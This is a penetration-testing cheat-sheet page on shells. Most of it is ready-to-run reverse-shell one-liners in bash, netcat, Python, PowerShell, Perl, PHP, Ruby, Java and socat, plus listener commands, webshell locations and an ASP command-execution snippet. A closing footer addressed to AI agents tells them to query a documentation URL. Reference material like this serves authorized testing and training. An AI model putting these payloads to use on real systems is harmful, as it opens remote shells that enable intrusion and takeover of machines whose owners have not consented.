# Shells

> In computing, a shell is a user interface for access to an operating system's services. In general, operating system shells use either a command-line interface or graphical user interface, depending on a computer's role and particular operation.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Shell_\(computing\))

## General

* [Reverse Shell Cheat Sheet | pentestmonkey](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
* [Reverse Shell Cheat Sheet | PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
* [Reverse Shell Generator](https://www.revshells.com)

Webshells in Kali

```
/usr/share/laudanum
/usr/share/webshells
```

[GitHub - tennc/webshell: This is a webshell open source project](https://github.com/tennc/webshell.git)\
E.g. `/usr/share/webshell/asp/webshell.asp`

## TTY

See [Terminal config & TTY](/the-pentesters-cheat-sheet/exploitation/shells/02-tty.md)

## Listeners

### netcat

[SANS Netcat cheat sheet](https://www.sans.org/posters/netcat-cheat-sheet/)\
Note: Try common ports like **443** if not working otherwise

```bash
nc -nlvp <port>
```

Listening using `rlwrap` (makes e.g. arrow keys work in shell)

```bash
rlwrap nc -lvnp <port>
```

### tcpdump

Listen for incoming icmp messages (like ping)

```bash
sudo tcpdump -i tun0 icmp
sudo tcpdump ip proto \\icmp -i tun0
```

## Reverse shells

### bash

```bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

```bash
"bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'"
```

```bash
exec 5<>/dev/tcp/<ip>/<port>
```

### netcat

```bash
nc -e /bin/sh <ip> <port>
```

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f
```

### python

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Powershell

See [PowerShell](/the-pentesters-cheat-sheet/misc/powershell.md)

Reverse shell (from <https://tryhackme.com/room/introtoshells>)

```powershell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

### perl

```bash
perl -e 'use Socket;$I="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -I");};'
```

### php

Linux: [php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell · GitHub](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)

Windows: [windows-php-reverse-shell/Reverse Shell.php at master · Dhayalanb/windows-php-reverse-shell · GitHub](https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php)

```bash
php -r '$sock=fsockopen("<ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```

### ruby

```bash
ruby -rsocket -e'f=TCPSocket.open("<ip>",<port>).to_i;exec sprintf("/bin/sh -I <&%d >&%d 2>&%d",f,f,f)'
```

### aspx

```bash
/usr/share/webshells/aspx/cmdasp.aspx
```

```
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("some cmd here")
o = cmd.StdOut.Readall()
Response.write(o)
%>
```

### java

```java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<ip>/<port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

### Socat

[socat - Multipurpose relay](http://www.dest-unreach.org/socat)

Listener

```bash
socat TCP-L:<port> -
```

Connect (Linux)

```bash
socat TCP:<ip>:<port> EXEC:"/bin/bash -li"
```

Connect (Windows)

```bash
socat TCP:<ip>:<port> EXEC:powershell.exe,pipes
```

#### Encrypted (and TTY)

Create cert

```bash
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
```

Listener

```bash
socat OPENSSL-LISTEN:<port>,cert=shell.pem,verify=0 FILE:`tty`,raw,echo=0 
```

Connect (Linux)

```bash
socat OPENSSL:<ip>:<port>,verify=0 EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/exploitation/shells/01-shells.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.